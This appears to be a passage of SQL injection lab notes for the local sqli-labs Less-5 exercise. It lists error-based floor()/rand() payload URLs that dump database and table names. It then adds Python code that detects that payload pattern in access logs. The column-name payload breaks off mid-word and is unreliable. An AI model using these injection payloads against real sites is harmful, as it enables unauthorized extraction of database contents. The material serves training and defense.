I. Error-based blind SQL injection: construct a payload so that the information is echoed back through the error message
General form:
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select (select (error statement)) from information_schema.tables limit 0,1))x from information_schema.tables group by x)a)--+
1. Using the floor() error, the injection statements are as follows:
Dump the database name:
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
Dump the table names:
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
Dump the column names:
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from informa
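
From the detection side, the requests above share one recognizable shape: floor(rand()*2) used inside a GROUP BY key together with count(*), usually against information_schema. The following is an added example, not part of the original notes; it flags that shape in web access-log request lines. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Markers of the floor()/rand() GROUP BY error technique described above.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)", re.I)
GROUP_BY = re.compile(r"group\s+by\b", re.I)
COUNT = re.compile(r"count\s*\(\s*\*?\s*\)", re.I)
SCHEMA = re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I)

def normalize(request_line):
    """URL-decode until stable (at most 3 rounds) so encoded keywords match."""
    text = request_line
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(request_line):
    """Return 'floor-error-sqli', 'suspicious' or 'clean' for one request line."""
    text = normalize(request_line)
    floor_rand = bool(FLOOR_RAND.search(text))
    # All three markers together: the full duplicate-key error construct.
    if floor_rand and GROUP_BY.search(text) and COUNT.search(text):
        return "floor-error-sqli"
    # One strong marker alone is worth a look but is not conclusive.
    if floor_rand or SCHEMA.search(text):
        return "suspicious"
    return "clean"

# Constructed sample request lines (not taken from a real log).
SAMPLE_LOG = [
    "GET /sqlilabs/Less-5/?id=1 HTTP/1.1",
    "GET /sqlilabs/Less-5/?id=-1%27%20and%20(select%201%20from%20(select%20"
    "count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name%20"
    "from%20information_schema.tables%20group%20by%20name)b)%23 HTTP/1.1",
    "GET /sqlilabs/Less-5/?id=-1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),"
    "CONCAT(FLOOR(RAND(0)*2),0x3a)x+FROM+information_schema.tables+"
    "GROUP+BY+x)a)--+ HTTP/1.1",
    "GET /search?q=group+by+tutorial HTTP/1.1",
    "GET /docs?q=information_schema.tables HTTP/1.1",
]

def scan(lines):
    """Classify every request line and return the verdicts in order."""
    return [classify(line) for line in lines]

if __name__ == "__main__":
    for verdict, line in zip(scan(SAMPLE_LOG), SAMPLE_LOG):
        print(f"{verdict:18} {line[:60]}")
```

A match here only says the request carried the pattern; whether the application was actually injectable depends on the query being built by string concatenation rather than with bound parameters.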